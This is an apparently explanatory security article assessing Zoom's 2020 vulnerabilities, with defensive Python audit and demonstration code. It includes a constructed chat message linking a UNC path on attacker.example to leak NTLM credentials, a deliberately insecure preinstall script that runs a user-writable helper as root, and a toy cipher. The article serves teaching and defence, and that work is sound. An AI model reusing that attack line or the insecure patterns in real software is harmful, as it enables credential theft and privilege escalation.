Why This is a Big Deal Right Now
In four short months, the video conferencing app Zoom went from roughly 10 million daily meeting participants to over 300 million. As the global pandemic unfolded, it became a household name while businesses scrambled to transition to remote work, schools began holding classes online, and virtual happy hours became the primary means of socializing.
With that expanding user base and climbing stock valuation came a greater level of scrutiny. Two recently publicized vulnerabilities brought back into the spotlight a number of previous security and privacy missteps by the video conferencing leader.
Security is more important than ever right now, with cybercriminals taking advantage of fear and a widespread desire for information. The question is: should you (or your organization) avoid Zoom?
Thing is, security decisions are never simple, and there isn't one answer for everyone. In light of that, let's go through the list of issues that have made the news media rounds and lay out the relevant facts, so you can make an informed decision on whether Zoom is secure enough for you.
Vulnerabilities Exposed MacOS and Webcams
What brought all of this into the public consciousness? Ex-NSA hacker Patrick Wardle publicly disclosed two vulnerabilities. The first allowed a local attacker (someone who could already run code as an ordinary user on the Mac) to abuse Zoom's installation procedure to gain root privileges, compromising the operating system itself. This exploited some strange software installation practices by Zoom; more on that below.
The second vulnerability allowed malware to gain access to the webcam and microphone without displaying a prompt or otherwise alerting the user. Zoom's use of Apple's hardened runtime should have prevented unsigned or third-party code from being loaded into its process, but Zoom had opted out of library validation with an entitlement. That exception let a malicious library be loaded into the Zoom process, which already held the user's camera and microphone permissions, so the injected code inherited them without any new prompt.
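The check a practitioner would run on any app that holds camera and microphone permission is to dump its entitlements and look for hardened-runtime exceptions. The following is an added example, not code from the article or from Zoom: it parses the XML that `codesign -d --entitlements :- /path/to/App.app` prints (recent macOS versions may need `--xml` added) and flags the combination the second Wardle bug needed, a runtime exception plus device access. Both entitlement blobs below are constructed for the demonstration and are not the real Zoom client's.

```python
import plistlib

# Constructed entitlements in the XML form that `codesign -d --entitlements :-`
# prints. Made up for this demonstration; not the real Zoom client's blob.
WEAKENED_ENTITLEMENTS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>com.apple.security.cs.disable-library-validation</key>
  <true/>
  <key>com.apple.security.device.camera</key>
  <true/>
  <key>com.apple.security.device.audio-input</key>
  <true/>
</dict>
</plist>
"""

# The same app with the hardened runtime left intact (also constructed).
HARDENED_ENTITLEMENTS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>com.apple.security.device.camera</key>
  <true/>
  <key>com.apple.security.device.audio-input</key>
  <true/>
</dict>
</plist>
"""

# Hardened-runtime exceptions that let foreign code run inside the process.
RUNTIME_EXCEPTIONS = {
    "com.apple.security.cs.disable-library-validation":
        "dylibs/frameworks need not be signed by the app's team (library injection or proxying)",
    "com.apple.security.cs.allow-dyld-environment-variables":
        "DYLD_INSERT_LIBRARIES and similar variables are honoured",
    "com.apple.security.cs.allow-unsigned-executable-memory":
        "unsigned executable memory is allowed",
    "com.apple.security.cs.disable-executable-page-protection":
        "executable pages may be rewritten at run time",
    "com.apple.security.get-task-allow":
        "other processes may attach with task_for_pid and read or write memory",
}

# TCC-gated capabilities that injected code inherits without a new prompt.
DEVICE_ACCESS = (
    "com.apple.security.device.camera",
    "com.apple.security.device.audio-input",
)


def audit_entitlements(xml_bytes):
    """Return the runtime exceptions and device grants found, and whether
    code injected via an exception would inherit camera/microphone access."""
    ents = plistlib.loads(xml_bytes)
    exceptions = [(key, why) for key, why in RUNTIME_EXCEPTIONS.items()
                  if ents.get(key) is True]
    devices = [key for key in DEVICE_ACCESS if ents.get(key) is True]
    return {
        "runtime_exceptions": exceptions,
        "device_access": devices,
        "injected_code_inherits_devices": bool(exceptions) and bool(devices),
    }


if __name__ == "__main__":
    for label, blob in (("weakened", WEAKENED_ENTITLEMENTS),
                        ("hardened", HARDENED_ENTITLEMENTS)):
        print(label, audit_entitlements(blob))
```

A device entitlement on its own is expected for a conferencing client; it is the pairing with a runtime exception that turns "malware on the box" into "malware with a silently authorised camera".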
How Serious Were Those Vulnerabilities?
Both of these vulnerabilities require that some kind of malware or untrusted user already be on the Mac in question. No security vulnerability exists in a vacuum, and every risk needs to be weighed in the context of how easy it is to exploit, what other layers of security exist around it, and what the consequences might be.
These Zoom vulnerabilities only become relevant if someone manages to get into your computer, just as leaving cash lying on your kitchen counter only becomes relevant if someone gets in the front door.
So let's try not to panic, and instead take a clear-eyed look at Zoom's track record and the current level of security in their product, so we can assess what level of risk it might present and how much to trust it.
What Were Those Previous Security Issues?
Windows Login Credentials
Disclosed: March 31, 2020. Fixed: April 1, 2020.
It was reported on BleepingComputer that, at the time, Zoom's chat converted Windows network UNC paths (\\server\share) into clickable links. Clicking one made Windows connect to that server over SMB and authenticate automatically, sending the user's NTLM challenge response across the internet, where an attacker-controlled server could capture it for offline cracking or relay it elsewhere.
That was possible because of how Windows handles NTLM: it will try to authenticate to any UNC path the user opens, a behaviour that has been causing this type of problem for a long time. So it's something of a chicken-and-egg question as to who's to blame: if Zoom didn't make these paths clickable, no exploit would be possible, but if Windows didn't hand out NTLM credentials so readily, Zoom's linkification would be a non-issue.
Also of note here is that an attacker would have had to get you on a Zoom call and then get you to click a link, which definitely affects the risk assessment for how likely this bug was to have caused problems.
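To make the application-side half of that concrete, here is an added example (not Zoom's code, and not from the original article) of a chat linkifier in the vulnerable shape beside a hardened one. The vulnerable version wraps anything that looks like a URL or a UNC path in an anchor; the hardened version only makes targets clickable whose scheme is on an allow-list, so UNC paths, file:, smb: and javascript: targets are rendered as plain text. The chat lines are constructed for the demonstration.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed chat lines for the demonstration (not real Zoom traffic).
ATTACKER_MESSAGE = r"slides are here: \\attacker.example\share\deck.pptx"
BENIGN_MESSAGE = "agenda: https://example.org/agenda"

# Tokens a naive linkifier would turn into anchors: http(s) URLs and UNC paths.
# On Windows, activating the UNC anchor makes the OS connect over SMB to
# attacker.example and authenticate automatically, leaking the user's NTLM
# challenge response to that server.
LINK_CANDIDATE_RE = re.compile(
    r"(?P<url>https?://[^\s<>\"']+)"          # http(s) URL
    r"|(?P<unc>\\\\[\w.-]+\\[^\s<>\"']+)",     # \\host\share\path
    re.IGNORECASE,
)


def _render(text, allow):
    """Escape the text for HTML, wrapping only the candidates `allow` accepts."""
    out, pos = [], 0
    for m in LINK_CANDIDATE_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        target = m.group(0)
        if allow(target):
            safe = html.escape(target, quote=True)
            out.append('<a href="{0}">{0}</a>'.format(safe))
        else:
            out.append(html.escape(target))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


def linkify_vulnerable(text):
    """Vulnerable: every candidate, UNC paths included, becomes clickable."""
    return _render(text, lambda target: True)


def safe_href(target):
    """Allow-list: only http/https with a host may be clickable. A UNC path has
    no scheme at all, and file:, smb: or javascript: schemes are rejected."""
    parts = urlsplit(target)
    return parts.scheme.lower() in ("http", "https") and bool(parts.netloc)


def linkify_hardened(text):
    """Hardened: UNC paths and non-http(s) schemes stay as inert text."""
    return _render(text, safe_href)


if __name__ == "__main__":
    for message in (ATTACKER_MESSAGE, BENIGN_MESSAGE):
        print("vulnerable:", linkify_vulnerable(message))
        print("hardened:  ", linkify_hardened(message))
```

The allow-list is the important design choice: a deny-list of `\\` prefixes would miss `file://` and `smb://` URLs, which trigger the same SMB authentication on Windows.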
The Facebook Oops
Disclosed: March 25, 2020. Fixed: March 27, 2020.
Motherboard reported that Zoom was sharing data on its mobile app users with Facebook. Which sounds bad, especially if one gets this information in the form of a sensational and (potentially) inaccurate headline.
If you look a little closer it begins to look, if still not great, then perhaps less bad. Zoom was using the Facebook SDK (software development kit), which is common practice among apps trying to easily integrate features. That SDK automatically sends data back to Facebook. Facebook's terms are transparent about this data collection, which left the onus on Zoom to tell its users what it should have known: Facebook gathers data.
The next thing to consider is the type of data that was being collected: the time that the user opened the app, what type of device they were using, their time zone, their carrier, and an advertising identifier which allowed companies to use targeted advertising for that device. Not all information is created equal, and none of this is personally identifiable information (PII) in the narrow sense, though an advertising identifier is persistent and exists precisely so that activity can be linked across apps. While passing any information without transparency is a blow to privacy, there's a difference between sharing device type and, say, name and address.
Mac Installer Scripts
Reported: April 1, 2020. Fixed: April 2, 2020.
Ever wondered how Zoom would magically open on a Mac without any visible installation process? It turns out that was because the installer package abused its preinstall script. Installer packages run these scripts automatically, before the user reaches the Install button, and they are meant for checks and preparatory work, not for placing the application itself.
Zoom used these scripts to install itself without ever requiring the user to click 'yes, install this on my Mac.' This isn't necessarily a security vulnerability on its own, but is certainly circumventing Apple's intended process for informing users as to what's happening on their Macs.
It was this installation procedure which, in one of the two Wardle disclosures, could allow a local attacker to get root privileges.
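Two things are worth checking in any .pkg before trusting it: whether a pre-flight script does installation work, and whether a script that root will run executes anything from a location an ordinary user can write to (the general shape of a local root-escalation bug). The following is an added example, not code from the article or from Zoom: it audits an expanded package directory (assumed to have been produced with `pkgutil --expand-full`, or `pkgutil --expand` followed by unpacking the `Scripts` archive) using simple, heuristic pattern matching. Both preinstall scripts are constructed for the demonstration and are not Zoom's real installer scripts.

```python
import os
import re
import tempfile
import textwrap

# Constructed preinstall script in the pattern the article describes: the
# "pre-flight" script places the app itself. Not Zoom's real script.
SNEAKY_PREINSTALL = textwrap.dedent("""\
    #!/bin/bash
    # looks like a compatibility check, actually performs the install
    ditto "$PWD/Contents/MyApp.app" "/Applications/MyApp.app"
    # root runs this helper from a path the logged-in user can write to
    "$HOME/Library/Caches/MyAppInstaller/runwithroot"
    exit 0
    """)

# Constructed script doing what a preinstall step is for: a check, nothing placed.
CLEAN_PREINSTALL = textwrap.dedent("""\
    #!/bin/bash
    # refuse to install on macOS older than 10.13
    minor="$(sw_vers -productVersion | cut -d. -f2)"
    [ "$minor" -ge 13 ] || exit 1
    exit 0
    """)

SCRIPT_NAMES = {"preinstall", "postinstall", "preupgrade", "postupgrade",
                "preflight", "postflight"}

# Commands that place or launch things. A preinstall script running them is
# installing outside the payload the user consents to. (Heuristic.)
PLACEMENT_CMD_RE = re.compile(
    r"^\s*(?:sudo\s+)?(?:/usr/bin/|/bin/)?"
    r"(cp|mv|ditto|rsync|installer|open|launchctl|curl|chmod|chown|xattr)\b",
    re.MULTILINE,
)
# Locations an unprivileged user controls; a root-run script referencing them
# is the classic privilege-escalation smell. (Heuristic.)
USER_WRITABLE_RE = re.compile(r"(/tmp/|/var/tmp/|/Users/|\$HOME\b|\$\{HOME\}|\$TMPDIR\b)")


def build_expanded_pkg(preinstall_body):
    """Write a minimal expanded-pkg layout (<root>/Scripts/preinstall) to a temp dir."""
    root = tempfile.mkdtemp(prefix="pkg-")
    scripts_dir = os.path.join(root, "Scripts")
    os.makedirs(scripts_dir)
    with open(os.path.join(scripts_dir, "preinstall"), "w") as fh:
        fh.write(preinstall_body)
    return root


def audit_pkg_scripts(expanded_root):
    """Walk an expanded package and report what each installer script does."""
    findings = []
    for dirpath, _, filenames in os.walk(expanded_root):
        for name in filenames:
            if name not in SCRIPT_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as fh:
                body = fh.read()
            placement = sorted(set(PLACEMENT_CMD_RE.findall(body)))
            user_paths = sorted(set(USER_WRITABLE_RE.findall(body)))
            findings.append({
                "script": os.path.relpath(path, expanded_root),
                "placement_commands": placement,
                "user_writable_refs": user_paths,
                "installs_in_preflight": name.startswith("pre") and bool(placement),
                "root_runs_user_controlled": bool(user_paths),
            })
    return findings


if __name__ == "__main__":
    for label, body in (("sneaky", SNEAKY_PREINSTALL), ("clean", CLEAN_PREINSTALL)):
        print(label, audit_pkg_scripts(build_expanded_pkg(body)))
```

Pattern matching on shell is only a triage aid; a hit means "read this script by hand", and a miss proves nothing. The point is that the questions are cheap to ask before the installer ever runs as root.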
Previous Install Workaround: The Web Server
Disclosed to Zoom: March 26, 2019. Fixed: June 24, 2019. Re-disclosed publicly (after a regression): July 8, 2019. Permanently fixed: July 9, 2019.
Let's be real here: Zoom has, in several instances, done weird things to make it easier to install Zoom, and that's gotten them into trouble. Back in 2019, it came to light that Zoom ran a local web server on every Mac it was installed on, which it used to get around Safari 12's prompt asking the user to confirm before a website may launch an application.
What was extra problematic about that workaround was that the web server stayed on your Mac even if you deleted the Zoom application, and would automatically reinstall Zoom if you tried to join a meeting.
That web server came to light when security researcher Jonathan Leitschuh posted a proof of concept detailing how the web server could be used to forcibly join a user to a Zoom call if they visited a malicious website.
Zoom subsequently removed the web server (at the same time, Apple pushed a silent Malware Removal Tool update that deleted it from all Macs), but have they learned their lesson? Well, Zoom says yes. But you can make your own judgement.
End-to-End Encryption
Reported: March 31, 2020. Ongoing.
The Intercept first reported that Zoom wasn't using true end-to-end encryption, despite assertions made by their marketing. The basic concept in end-to-end encryption is that no one but the people on either end of the call has access to the decrypted information. FaceTime, for example, is end-to-end encrypted, which means (in theory) that no one, not even Apple, can eavesdrop. So were the federal government to subpoena them, Apple could only shrug.
Zoom calls are encrypted, but only between each client and Zoom's servers, using keys that Zoom's infrastructure generates and distributes. That is not end-to-end encryption, because the server can decrypt the media. If the U.S. government were to subpoena them (or China, as discussed in the Intercept), they could conceivably be compelled to hand over your Zoom calls. Further, if Zoom's infrastructure were compromised, bad actors could conceivably get access.
This is a challenging engineering problem, one that notably took Apple years to solve for FaceTime (which still only allows for a maximum of 32 participants). However, with Zoom's recent acquisition of Keybase, they're working to fast-track end-to-end encryption.
That said, Zoom's current encryption is probably good enough for a lot of people, especially with their April 29 release of AES 256-bit GCM encryption with Zoom 5. GCM matters because it authenticates the ciphertext as well as encrypting it; Citizen Lab had found the earlier client using AES-128 in ECB mode, which does neither well. It's certainly more secure than a landline phone call, which isn't encrypted at all. The level of security warranted is relative to the exploitable value of what's being protected. So it may not be ready for state secrets yet, but probably okay for happy hour with your mom.
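The difference between "encrypted" and "end-to-end encrypted" comes down to who holds the key, and that is easiest to see by modelling both call shapes and recording what the provider's server could hand over. The following is an added example, not code from the article or from Zoom: a toy authenticated cipher built from the standard library stands in for AES-256-GCM (which the standard library lacks) and must not be used for anything real; the message is constructed. The relay in the hop-by-hop model decrypts and re-encrypts, so it sees plaintext; the relay in the end-to-end model only forwards bytes it cannot read. A tamper check at the end shows the "authenticated" half of authenticated encryption.

```python
import hashlib
import hmac
import os

# Toy authenticated encryption from the standard library only, so this runs
# anywhere. Stand-in for AES-256-GCM; illustration only, never for real use.
def _keystream(key, nonce, length):
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def seal(key, plaintext):
    """nonce || ciphertext || tag"""
    nonce = os.urandom(12)
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()[:16]
    return nonce + ciphertext + tag


def open_(key, blob):
    nonce, ciphertext, tag = blob[:12], blob[12:-16], blob[-16:]
    expected = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: wrong key or tampered data")
    return bytes(c ^ k for c, k in zip(ciphertext, _keystream(key, nonce, len(ciphertext))))


class MediaServer:
    """The provider's relay. Whatever it can read is what a subpoena, or a
    compromise of the provider, can obtain."""
    def __init__(self):
        self.readable = []   # everything the server held in plaintext
        self.forwarded = []  # bytes it relayed without being able to read them


def transport_encrypted_call(message):
    """Hop-by-hop: each client shares a key with the server, not with its peer."""
    server = MediaServer()
    key_alice_server, key_server_bob = os.urandom(32), os.urandom(32)
    uplink = seal(key_alice_server, message)
    plaintext_at_server = open_(key_alice_server, uplink)   # server decrypts...
    server.readable.append(plaintext_at_server)
    downlink = seal(key_server_bob, plaintext_at_server)    # ...and re-encrypts
    return open_(key_server_bob, downlink), server


def end_to_end_call(message):
    """End-to-end: only the two endpoints hold the key; the server relays opaque bytes."""
    server = MediaServer()
    key_alice_bob = os.urandom(32)   # agreed between the endpoints, never given to the server
    on_wire = seal(key_alice_bob, message)
    server.forwarded.append(on_wire)
    return open_(key_alice_bob, on_wire), server


def server_can_read(server, message):
    return message in server.readable


def tampered_is_rejected(key, blob):
    """Flip one ciphertext bit; authenticated encryption must refuse to decrypt."""
    forged = bytearray(blob)
    forged[12] ^= 0x01
    try:
        open_(key, bytes(forged))
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    msg = b"constructed sample: quarterly numbers, not public yet"
    _, hop = transport_encrypted_call(msg)
    _, e2e = end_to_end_call(msg)
    print("transport-encrypted, server can read:", server_can_read(hop, msg))
    print("end-to-end, server can read:", server_can_read(e2e, msg))
```

Note what the end-to-end model leaves unsolved: how Alice and Bob agree on `key_alice_bob` without the server being able to substitute its own, which is the key-distribution problem that makes group calling at scale the hard part.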
What About Next Time?
When you line it all up, it does start to look concerning, and many security and privacy die-hards have accused Zoom of not adequately prioritizing security. In particular, the repeated attempts to make Zoom easier to install by circumventing the security measures of other applications are starting to look like a trend.
But Zoom has made a public commitment to improve, freezing feature updates for 90 days to focus on security. It remains to be seen how effective that will be, adding another drop of uncertainty to the veritable ocean of it we're all currently swimming in.
It might be that the next Zoom vulnerability is waiting around the corner, but unfortunately that's the case with all software. Bugs are inevitable, and some of them are going to create vulnerabilities. That's why security is such an important and complex undertaking.
An enterprise network with access to valuable information needs a higher level of security than a home network, with fail-safes to deal with vulnerability-caused breaches when—not if—they happen. Detection and response models of security are increasingly becoming the answer for sophisticated security operations, whether that's endpoint detection and response monitoring endpoints individually, or network detection and response looking at the broader picture of every communication traversing the network—or, best of all, both.
There is no perfect, vulnerability-free software. The only thing you can do is have a strong risk model so that when new threats inevitably arise, whether that's via Zoom or anywhere else in your technology stack, you can respond accordingly.